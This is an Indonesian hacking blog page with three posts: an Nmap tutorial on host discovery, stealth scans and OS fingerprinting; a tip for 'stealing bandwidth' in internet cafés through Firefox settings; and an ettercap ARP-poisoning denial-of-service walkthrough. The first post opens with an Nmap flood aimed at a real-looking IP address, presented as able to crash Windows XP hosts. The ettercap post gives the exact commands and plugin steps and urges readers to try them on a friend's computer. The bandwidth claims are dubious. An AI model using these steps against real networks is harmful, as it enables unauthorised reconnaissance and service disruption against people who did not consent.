} Roby Novianto a.k.a linuxer46: 2010
  • Read This !!!

    “Untuk mengikuti jalan – pandanglah sang ahli – ikuti sang ahli – berjalan bersama sang ahli – kenali sang ahli -jadilah sang ahli" counter

Attack Nmap

Posted by Dian Okta On 8:51 AM 1 comments

Nmap adalah sebuah tool pemeta jaringan yang banyak di pakai oleh hacker. Banyak metode scanning yang bisa dilakukan oleh nmap dan salah satunya adalah -sT scanning.
Hal lain yang dapat kamu lakukan dengan -sT scanning adalah DoS (Denial of Service) sebuah Host.
seperti contoh dibawah ini..... (don't blame me for this.....!!)

1. linuxer46# nmap -T 5 -M 1000 -sT 203.130.254.xx

Warning: Your max_parallelism (-M) option is absurdly high! Don't complain to Fyodor if all hell breaks loose!berhubung target tujuan sudah memakai Stack-Guard (maka tidak terjadi kerusakan), tapi apabila anda melakukan ini ke Host yang running W*ndows XP kemungkinan 95% akan mengalami Crash.bila kamu perhatikan bahwa aku memberi nmap -T 5 -M 1000,"Flag" -M adalah "Flag" untuk menggunakan jumlah maksimal "socket" yang digunakan oleh Nmap dan 60 "Socket" sudah bisa dikategorikan banyak (dan diatas aku memakai 1000 !! tapi sangat efektif Bro....).


Cara yang paling sederhana untuk mengetahui apakah sebuah komputer atau host aktif atau tidak aktif adalah dengan menggunakan perintah ping sebagai berikut:


C:\>ping server1

Pinging server1 [128.1.10.25] with 32 bytes of data:

Reply from 128.1.10.25: bytes=32 time<10ms TTL=128
Reply from 128.1.10.25: bytes=32 time<10ms TTL=128
Reply from 128.1.10.25: bytes=32 time<10ms TTL=128
Reply from 128.1.10.25: bytes=32 time<10ms TTL=128

Ping statistics for 128.1.10.25:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>


Hasil reply di atas menunjukkan bahwa host server1 sedang aktif alias tidak mati. Jika hostnya sedang tidak aktif alias mati hasilnya adalah sebagai berikut:

C:\>ping 192.168.1.95

Pinging 192.168.1.95 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.1.95:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>



Nah yang menjadi masalah dan bikin pusing adalah bagaimana jika Anda (hacker) ingin mencari tahu apakah ada host yang aktif dalam sebuah network perusahaan tertentu yang terhubung ke internet. Jika network perusahaan tersebut merupakan network kelas C maka jumlah host maksimalnya adalah 256 host. Jadi jika harus menggunakan perintah ping satu per satu, berapa kali Anda harus mengetikkan perintah ping tersebut ? Wah, tentu saja membutuhkan waktu yang lama dan tentu saja bikin pusing dan males. Nmap memberikan solusi yang cepat. Misalnya Anda ingin memeriksa apakah ada host yang aktif pada network kelas C dengan nomor IP 192.168.1.1 s/d 192.168.1.10 Maka Anda dapat memeriksa dengan perintah sebagai berikut:



C:\> nmap -sP 192.168.1.91-100

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 15:40
SE Asia
Standard Time

Host NARUTO (192.168.1.91) appears to be up.
Host SASUKE (192.168.1.92) appears to be up.
Host SAKURA (192.168.1.93) appears to be up.
Host NEJI (192.168.1.94) appears to be up.
Host LEE (192.168.1.96) appears to be up.
Host KIBA (192.168.1.97) appears to be up.
Host COUJI (192.168.1.98) appears to be up.
Host ADMINISTRASI (192.168.1.100) appears to be up.

Nmap run completed -- 10 IP addresses (8 hosts up) scanned in 9.880
seconds

C:\>




Perhatikan hasil Nmap di atas bahwa dari 10 host yang discan ternyata hanya ditemukan 8 host yang aktif, IP 192.168.1.95 dan IP 192.168.1.99 tidak ditemukan atau tidak aktif atau mungkin memang tidak ada.Mudah saja bukan.

Option –sP merupakan salah satu type scanning dari Nmap berbasis ICMP, dimana umumnya dipergunakan untuk melakukan ping terhadap sejumlah IP sekaligus. Harap diperhatikan bahwa –sP bersifat case sensitive. Jika anda menggunakan –sp maka perintah tersebut tidak dikenal.

Pada umumnya server-server web publik yang baik selalu berada dibelakang firewall, sehingga biasanya proses ping dapat diblokir apabila melewati router atau firewall tersebut, akibatnya Anda tidak dapat mendeteksi apakah server web tersebut aktif atau tidak. Untuk itu diperlukan teknik lainnya untuk memastikan apakah server web tersebut dalam kondisi hidup atau tidak. Perhatikan contoh hasil ping pada server web yang berada di belakang firewall berikut ini:


C:\>ping webserver

Pinging webserver [128.1.7.13] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 128.1.7.13:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>


Nmap dapat dipergunakan untuk menyiasati masalah diatas yaitu dengan melakukan scanning terhadap port yang terbuka dari host target. Jika host yang menjadi target pemeriksaan adalah server web, maka umumnya akan membuka port 80 http. Dengan memanfaatkan port 80, maka Anda dapat mendeteksi apakah host target tersebut dalam keadaan hidup atau mati.


C:\> nmap -sP -PT80 128.1.7.13
Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 16:42
SE Asia
Standard Time
Host webserver (128.1.7.13) appears to be up.
Nmap run completed -- 1 IP address (1 host up) scanned in 3.890 seconds
C:\>


Option –PT80 menunjukkan port yang akan dimanfaatkan adalah port 80. Default dari Nmap adalah port 80, jadi sebenarnya Anda dapat mencantumkan –PT saja untuk menunjukkan proses scanning melalui port 80.

Selanjutnya Anda dapat pula menguji coba untuk port umum lainnya. Misalnya jika host yang menjadi target Anda adalah mail maka Anda dapat menguji dengan port 25 (SMTP) atau port 110 (POP3), demikian seterusnya.


3.Port Scanning



Port scanning adalah proses koneksi ke port-port TCP atau UDP pada host yang menjadi target untuk menentukan service apa yang sedang berjalan (Listening). Dengan mengidentifikasi port-port yang listening ini Anda dapat menentukan jenis aplikasi dan sistem operasi apa yang dipergunakan pada host tersebut. Service yang dalam status listening ini memungkinkan orang yang tidak berhak menerobos ke dalam host tersebut.

Untuk mengetahui port apa saja yang listening dari sebuah host dapat menggunakan cara sebagai berikut:

C:\> nmap -sS 128.1.71.103

Starting nmap V. 3.00 ( http://www.insecure.org/nmap )
Interesting ports on (128.1.71.103):
(The 1589 ports scanned but not shown below are in state: closed)
Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1026/tcp open LSA-or-nterm
1031/tcp open iad2
Nmap run completed -- 1 IP address (1 host up) scanned in 5 seconds

C:\>




Option –sS merupakan salah satu type scanning dari Nmap yaitu TCP SYN scan yang dipergunakan untuk mendeteksi port apa saja yang terbuka. Teknik ini sering disebut Half Open scan karena dalam melakukan evaluasi terhadap port tidak membuka hubungan komunikasi TCP/IP secara penuh. Artinya secara teknis komputer yang Anda pergunakan untuk mendeteksi port tersebut akan mengirimkan paket SYN ke host target. Jika SYN|ACK paket dikirim balik, berarti port tersebut tertutup. Setelah memperoleh paket balasan, komputer Anda akan menjawab dengan paket RST untuk me-reset hubungan yang hampir terjadi tersebut (itu sebabnya disebut half Open). Teknik ini hampir tidak terdeteksi oleh host target yang tidak secara maksimal mencatat aktifitas portnya. Istilah kerennya –sS adalah stealth scan atau scan yang tidak terdeteksi.

Untuk melakukan scan port tertentu dapat menggunakan option –p sebagai berikut:

C:\>nmap -sS -p 21,23,25,53,80,110 adminristek

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-30 14:50 SE
Asia
Standard Time
Interesting ports on adminristek (128.1.9.81):
PORT STATE SERVICE

21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
53/tcp closed domain
80/tcp open http
110/tcp closed pop-3

Nmap run completed -- 1 IP address (1 host up) scanned in 1.590 seconds

C:\>



Perhatikan bahwa terdapat port 53 yang sedang tidak terbuka alias close.



Lebih Jauh tentang Jenis Port Scanning pada Nmap




Setiap pengelola sistem memiliki strategi pengamanan yang berbeda-beda. Untuk itu cara-cara yang telah dijelaskan di atas mungkin tidak selalu dapat diterapkan. Nmap sendiri memberikan beberapa teknik port scanning untuk menghadapi “medan” tempur yang berbeda-beda. Untuk itu terkadang dibutuhkan latihan dan kreatifitas yang tinggi bagi Anda yang ingin menembus sistem pertahanan lawan tanpa diketahui pemiliknya (Oops, kami tidak menyarankan apalagi memprovokasi Anda lho). Diatas telah diperkenalkan beberapa option dari Nmap yang merupakan teknik scan. Berikut ini teknik scan lanjutan yang dapat Anda manfaatkan sesuai dengan medan tempur yang ada:


a. TCP connect scan -sT
Jenis scan ini terhubung ke port host target dan menyelesaikan three-way handshake (SYN, SYN/ACK dan ACK) Scan ini mudah terdeteksi oleh pengelola host target.
b. TCP SYN Scan -sS
Teknik ini dikenal sebagai half-opening scanning karena suatu koneksi penuh tidak sampai terbentuk. Suatu paket SYN dikirimkan ke port host target. Bila SYN/ACK diterima dari port host target, maka Anda dapat mengambil kesimpulan bahwa port tersebut dalam status listening. Jika RST/ACK Anda terima, biasanya menunjukkan bahwa port tersebut tidak listening. Suatu RST/ACK akan dikirim oleh mesin yang melakukan scanning sehingga koneksi penuh tidak akan terbentuk. Teknik ini bersifat siluman dibandingkan dengan TCP koneksi penuh dan tidak akan tercatat pada log host target.
c. TCP FIN scan –sF
Teknik ini mengirimkan suatu paket FIN ke port host target. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk setiap port yang tertutup. Teknik ini hanya dapat dipakai pada stack TCP/IP berbasis Unix.
d. TCP Xmas tree scan -sX
Teknik ini mengirimkan suatu paket FIN, URG dan PUSH ke port host target. Berdasarkan RFC 793, host target akan mengembalikan suatu RST untuk semua port yang tertutup.
e. TCP Null scan -sN
Teknik ini membuat off semua flag. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk semua port yang tertutup.
f. TCP ACK scan -sA
Teknik ini digunakan untuk memetakan set aturan firewall. Hal ini sangat membantu Anda dalam menentukan apakah firewall yang dipergunakan adalah simple packet filter yang membolehkan hanya koneksi penuh saja (koneksi dengan bit set ACK) atau suatu firewall yang menjalankan advance packet filtering.
g. TCP Windows scan -sW
Teknik ini dapat mendeteksi port-port terbuka maupun terfilter/tidak terfilter pada sistem-sistem tertentu seperti pada AIX dan Free BSD sehubungan dengan anomali dari ukuran windows TCPnya.
h. TCP RPC Scan -sR
Teknik ini spesifik hanya pada sistem Unix dan digunakan untuk mendeteksi dan mengidentifikasi port RPC dan program serta nomor versi yang berhubungan dengannya
i. UDP Scan -sU
Teknik ini mengirimkan suatu paket UDP ke port host target. Bila port host target memberikan response pesan berupa “ICMP port unreachable” artinya port ini tertutup. Sebaliknya bila tidak menerima pesan tersebut, Anda dapat menyimpulkan bahwa port tersebut terbuka. Karena UDP dikenal sebagai connectionless protocol, maka akurasi teknik ini sangat bergantung pada banyak hal sehubungan dengan penggunaan jaringan dan sistem reources lainnya.


Apapun teknik port scan yang akan Anda pergunakan, Anda perlu berhati-hati dalam menggunakan terhadap host target. Tindakan Anda melakukan port scanning ke host target yang bukan wewenang Anda dapat saja menimbulkan reaksi yang mungkin tidak Anda duga sebelumnya dari pengelola host target seperti serangan balik, pemblokiran terhadap acount oleh ISP dan sebagainya. Jadi sebaiknya Anda menguji coba pada sistem Anda sendiri.

3.Mendeteksi Sistem Operasi


Cara klasik mendeteksi sistem operasi host tertentu sebenarnya dapat dilakukan dengan cara menggunakan telnet sebagai berikut:

#telnet hpux.u-aizu.ac.jp

Trying 163.143.103.12 ...
Connected to hpux.u-aizu.ac.jp.
Escape character is '^]'.

HP-UX hpux B.10.01 A 9000/715 (ttyp2)
login:






Pengelola sistem komputer yang pengalaman tentu saja tidak akan memberikan banner sistem operasi dengan begitu saja dan biasanya fasilitas banner tersebut mereka memodifikasi atau dihilangkan. Jika hal tersebut terjadi, Anda dapat mencoba dengan cara lain misalnya melalui service yang terbuka semisal FTP sebagai berikut:

# telnet http://ftp.netscape.com 21

Trying 207.200.74.26 ...
Connected to http://ftp.netscape.com.
Escape character is '^]'.
220 ftp29 FTP server (UNIX® System V Release 4.0) ready.
SYST
215 UNIX Type: L8 Version: SUNOS




Namun demikian, semua yang default sekali lagi biasanya diubah oleh pengelola sistem komputer. Untuk itu maka umumnya para hacker langsung memanfaatkan Nmap !

Untuk mendeteksi sistem operasi dari host target, sebenarnya Anda dapat menganalisa dari hasil port scanning di atas. Apabila Anda menemukan port 139 dan 135 terbuka, maka besar kemungkinan bahwa host target adalah Windows NT. Windows NT umumnya listen pada port 135 dan 139. Berbeda dengan listen pada windows 95/98 yang hanya listen pada port 139. Aktifnya beberapa port di sistem Unix juga dapat mencirikan jenis sistem operasi tersebut.

Penggunaan option –O diperuntukan untuk mendeteksi jenis sistem operasi, sebagai berikut:


C:\> nmap -O ristbook

Starting nmap V. 3.00 ( http://www.insecure.org/nmap )
Interesting ports on ristbook (128.1.71.103):
(The 1589 ports scanned but not shown below are in state: closed)
Port State Service

7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1026/tcp open LSA-or-nterm
1031/tcp open iad2
Remote operating system guess: Windows Millennium Edition (Me), Win 2000,
or Win XP
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

C:\>



Berikut ini contoh untuk hasil pada sistem operasi Linux:

C:\> nmap -O adminristek

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 18:01
SE Asia
Standard Time
Interesting ports on adminristek (128.1.9.81):
(The 1646 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
79/tcp open finger
80/tcp open http
98/tcp open linuxconf
113/tcp open auth
139/tcp open netbios-ssn
513/tcp open login
514/tcp open shell
1984/tcp open bigbrother

Device type: general purpose
Running: Linux 2.1.X|2.2.X
OS details: Linux 2.1.19 - 2.2.25, Linux 2.2.19 on a DEC Alpha
Nmap run completed -- 1 IP address (1 host up) scanned in 12.020 seconds

C:\>



Berikut ini contoh untuk hasil pada sebuah Cisco 1750:

C:\> nmap -sS -O 128.1.8.5
Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-30 15:18
SE Asia
Standard Time
Interesting ports on 128.1.8.5:
(The 1655 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE
23/tcp open telnet
79/tcp open finger

Device type: router|s
Running: Cisco IOS 11.X
OS details: Cisco s/router with IOS 11.1(7)-11.2(8.10), Cisco
Router/S
with IOS 11.2
Nmap run completed -- 1 IP address (1 host up) scanned in 30.160 seconds

C:\>



Jika host target hanya membuka port 80 (http), maka kita dapat mensiasati dengan port scanning melalui port tersebut sebagai berikut:

C:\>nmap -PT80 -O webserver

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2003-09-26 18:55
SE Asia
Standard Time
Interesting ports on webserver (128.1.7.13):
(The 1647 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1027/tcp open IIS
1433/tcp open ms-sql-s
1503/tcp open imtc-mcs
1720/tcp open H.323/Q.931
3372/tcp open msdtc

Device type: general purpose
Running: Microsoft Windows 95/98/ME|NT/2K/XP
OS details: Microsoft Windows Millennium Edition (Me), Windows 2000
Professional
or Advanced Server, or Windows XP
Nmap run completed -- 1 IP address (1 host up) scanned in 7.520 seconds.

Semoga bermanfaat Bro....
Klik lagi...

Curi Bandwith via MOzilla

Posted by Dian Okta On 8:48 AM 0 comments

Terkadang kalo kita lagi oL di warnet atau dimanapun berada, tentunya yang ada jaringan internetnya.....
Pas banyak user yang oL, pasti terasa lemot koneksinya...
Bila kita memakai Mozilla Firefox, kita bisa nyuri bandwith biar tetep cepet
Nie caranya>>>

1. Buka Browser Mozilla Firefox
2. Pada Address Bar Ketik : ABOUT:CONFIG
3. Cari string di bawah ini : ( pastikan semua srting dibawah “TRUE”)

contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
4. buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER
5. Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6. Kemudian REFRESH atau Tekan F5
7. Pada Address Bar Ketik : ABOUT:BLANK

Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
8. Pada Option:

ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
9. Kemudian Tekan OK Lalu REFRESH ( F5 )
10. Masuk Ke Link Ini :

https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125
atau :
https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox
11. Download Software SwitchProxy Tool Versi 1.3.4
12. Setelah Selesai Jangan Tekan Tombol UPDATE
13. Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
14. Tutup Semua Browser Mozilla FireFox,
15. Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
16. Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.Sekarang Browser Mozilla Siap Untuk Digunakan

Catatan :

– Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
– Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT.
Klik lagi...

DOS Attack di Linux

Posted by Dian Okta On 8:17 AM 3 comments

Masih ingatkah serangan DOS-attack ( Denial of Service attack ) yang sering digunakan hacker ? Serangan ini menggunakan port-port yang tidak terlindungi pada suatu server lalu mem-bombardir tanpa ampun! Hasilnya adalah server / komputer yang diserang perlahan akan lelet dan akhirnya hang.Pada Debian Etch 4.0, tools ini sudah ada tetapi harus diinstal terlebih dahulu dari repositori-nya, tinggal di eksekusi melalui konsole dengan command ettercap. Lalu bagaimana kinerja DOS attack, cara menggunakan ettercap dan efek serangan DOS?

DOS attack menggunakan ARP sebagai medianya. Kinerja dari DOS attack ini adalah menganalisis port-port yang tidak terproteksi lalu mengirim data-data dalam jumlah banyak pada port tersebut agar server menjadi hang atau crash. Keuntungan bila server crash? tentu ini tidak perlu saya jelaskan bukan? Bila serangan ini difokuskan pada port 80, maka website yang dihosting pada server tersebut akan mati. Kenapa mati? karena Apache ( bila server menggunakan webserver ini ) akan kelebihan beban dan hasilnya overload. Pada kasus berikut, spesifikasi mini server saya adalah AthlonXP 2600+, Ram 512MB, OS Debian etch 4.0 dan menggunakan kabel LAN cross sebagai komunikasi. Pada mini server ini, service yang saya hidupkan sebagai berikut :

linuxer46:/# nmap -sS yodi.web.ugm.ac.id

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-06-29 11:16 UTC
Interesting ports on Leonzack.yodi.web.ugm.ac.id (192.168.0.1):
Not shown: 1669 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
113/tcp open auth
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql

Nmap finished: 1 IP address (1 host up) scanned in 0.127 seconds

Pada server mini tidak terpasang firewall sama sekali ( semacam dog guard,etc ). Pada percobaan pertama, mas agus menguji coba dengan command :

################################################################################​
linuxer46:~# ettercap -T -M arp // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

eth0 -> 00:00:50:00:46:2C 192.168.0.1 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
|=======================> | 45.10 %
################################################################################​

Setelah proses scanning 100% dan muncul data-data sniffing, tekan p untuk masuk ke opsi selanjutnya.dan muncul :

################################################################################​
Available plugins :

[0] arp_cop 1.1 Report suspicious ARP activity
[0] autoadd 1.2 Automatically add new victims in the target range
[0] chk_poison 1.1 Check if the poisoning had success
[0] dns_spoof 1.1 Sends spoofed dns replies
[0] dos_attack 1.0 Run a d.o.s. attack against an IP address
[0] dummy 3.0 A plugin template (for developers)
[0] find_conn 1.0 Search connections on a switched LAN
[0] find_ettercap 2.0 Try to find ettercap activity
[0] find_ip 1.0 Search an unused IP address in the subnet
[0] finger 1.6 Fingerprint a remote host
[0] finger_submit 1.0 Submit a fingerprint to ettercap's website
[0] gre_relay 1.0 Tunnel broker for redirected GRE tunnels
[0] gw_discover 1.0 Try to find the LAN gateway
[0] isolate 1.0 Isolate an host from the lan
[0] link_type 1.0 Check the link type (hub/s)
[0] pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2
[0] pptp_clear 1.0 PPTP: Tries to force cleartext tunnel
[0] pptp_pap 1.0 PPTP: Forces PAP authentication
[0] pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation
[0] rand_flood 1.0 Flood the LAN with random MAC addresses
[0] remote_browser 1.2 Sends visited URLs to the browser
[0] reply_arp 1.0 Simple arp responder
[0] repoison_arp 1.0 Repoison after broadcast ARP
[0] scan_poisoner 1.0 Actively search other poisoners
[0] search_promisc 1.2 Search promisc NICs in the LAN
[0] smb_clear 1.0 Tries to force SMB cleartext auth
[0] smb_down 1.0 Tries to force SMB to not use NTLM2 key auth
[0] stp_mangler 1.0 Become root of a switches spanning tree



Packet visualization stopped...
Plugin name (0 to quit): dos_attack
################################################################################​

Setelah itu anda tinggal memasukkan ip address korban beserta ip lain agar ip anda tidak dapat dilihat.( tapi tetap saja bisa dilihat ).

###########################################
Activating dos_attack plugin...

Insert victim IP: 192.168.0.4
Insert unused IP: 192.168.0.3
###########################################

Bila muncul berbagai command-command poisoning ARP yang bertebaran tinggal tunggu saja komputer korban akankah teler atau tidak. Dapat anda ujicoba pada komputer teman anda sebagai percobaan. Selamat bermain-main DOS attack di Linux!
Klik lagi...